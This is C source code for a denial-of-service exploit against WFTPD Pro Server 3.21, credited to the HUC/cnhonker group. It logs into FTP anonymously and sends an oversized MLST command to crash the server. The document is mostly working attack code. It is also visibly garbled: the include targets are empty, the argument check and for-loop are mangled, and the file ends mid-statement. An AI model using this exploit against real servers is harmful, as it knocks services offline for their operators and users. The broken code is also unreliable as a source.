/*
*-----------------------------------------------------------------------
* 
* wftpd.c - WFTPD Pro Server 3.21 MLST DoS Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author   : lion
*             : lion cnhonker net
*             : www cnhonker com
* Date     : 2004-08-30
*
*-----------------------------------------------------------------------
*/

#include 
#include 
#include  

#pragma comment(lib, "ws2_32.lib")

#define FTPPORT      21
#define BUFFSIZE     204800
#define OVERFLOWSIZE 220
#define SIZE         2048      

// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);

int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];

void main(int argc, char *argv[])
{
    WSADATA wsa;
    unsigned short    port;
    unsigned long     ip;
    char user[32] = "anonymous";
    char pass[32] = "anonymous";
    int i;
    
    char *command = "MLST ";

    SOCKET s;
    int size = OVERFLOWSIZE;

    printf("WFTPD Pro Server 3.21 MLST DoS Exploit\r\n");
        printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");

    if(argc  \r\n", argv[0]);
        return;
    }
    
    WSAStartup(MAKEWORD(2,2),&wsa);

    if((s=create_socket())==0) 
    {
        printf("[-] ERROR: Create socket failed.\r\n");
        return;
    }
      
    if(!client_connect(s, argv[1], atoi(argv[2])))
        exit(-1);
    
    loginftp(s, user, pass);
    
    memset(sendbuf, 0 ,BUFFSIZE);
    memcpy(sendbuf, "pasv\r\n", 6);
    writebuf("Send pasv", s, sendbuf, 6);
    readbuf("read", s, recvbuf, BUFFSIZE);
    
    for(i=0;ih_addr);
    printf("[+] Trying %s:%d......", server, port);
    fflush(stdout);

    if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))